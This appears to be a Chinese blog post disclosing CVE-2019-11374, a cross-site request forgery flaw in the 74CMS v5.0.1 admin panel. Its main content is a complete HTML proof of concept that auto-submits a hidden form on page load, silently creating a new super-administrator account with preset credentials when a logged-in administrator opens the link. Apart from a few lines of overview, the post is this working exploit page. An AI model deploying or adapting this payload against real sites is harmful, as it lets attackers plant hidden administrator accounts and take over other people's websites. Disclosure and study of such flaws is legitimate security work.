CVE-2019-11374-骑士74CMS v5.0.1后台管理页面存在CSRF漏洞

二、漏洞概述 登陆后台管理页面,可以添加管理员  添加信息 抓取数据包 管理员登陆后台管理界面后点击 […]

二、漏洞概述

登陆后台管理页面,可以添加管理员 

1.png

添加信息

2.png

抓取数据包

3.png
4.png

管理员登陆后台管理界面后
点击hacker发来的如下链接
即可创建一个新的超级管理员用户 

附上poc

<!DOCTYPE html>
<html>
  <head>
  <title> CSRF </title>
  <script type="text/javascript">
    function exec1(){
      document.getElementById('form1').submit();
    }
  </script>
  </head>
  <body onload="exec1();">
    <form id="form1" action="https://www.0dayhack.com/index.php?m=Admin&c=admin&a=add" method="POST">
      <input type="hidden" name="username" value="admin688" />
  <input type="hidden" name="email" value="111111111@qq.com" />
      <input type="hidden" name="password" value="admin688" />
      <input type="hidden" name="repassword" value="admin688" />  
  <input type="hidden" name="role_id" value="1" />
    </form>
  </body>
</html>

人已赞赏
0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧